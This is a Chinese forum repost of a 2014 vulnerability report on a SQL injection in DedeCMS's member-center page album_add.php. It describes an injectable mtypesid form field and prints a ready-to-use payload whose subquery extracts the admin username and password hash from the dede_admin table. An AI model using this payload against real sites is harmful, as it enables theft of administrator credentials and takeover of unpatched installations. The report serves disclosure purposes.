忘记密码?

一键登录

草根吧源码论坛

Dedecms会员中心album_add.php页面SQL注入漏洞

查看: 323|回复: 0

Dedecms会员中心album_add.php页面SQL注入漏洞

[复制链接]

5760

主题

704

热度

2218

贡献

管理员

Rank: 9Rank: 9Rank: 9

DZ专员

发表于 2014-9-28 10:16:34 | 显示全部楼层 |阅读模式 | 百度  360  谷歌 
分享到:
简要描述:

注册和关注wooyun好久了,dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的
漏洞需要会员,所以比较鸡肋啦

详细说明:

发表文章处,post表单的mtypesid可以注入

/dedecmsnew/member/album_add.php



注入的代码:

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',

'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

草根吧 Dedecms会员中心album_add.php页面SQL注入漏洞 会员,中心 站长头条 1209090193aa72e6d16883f4befe41603bde5cd2


漏洞证明:

草根吧 Dedecms会员中心album_add.php页面SQL注入漏洞 会员,中心 站长头条 12090916e947591ebafd233766ce20ff911bc7f7


帖子地址: 

本文来源于草根吧源码论坛 www.caogen8.co,欢迎大家下载。
如果您没有贡献需要充值,可以直接在线充值,点击充值
如果你需要加入本站赞助VIP会员,可以直接在线开通,点击开通
如果找不到您要的资源,请搜索一下,点击搜索
回复

举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表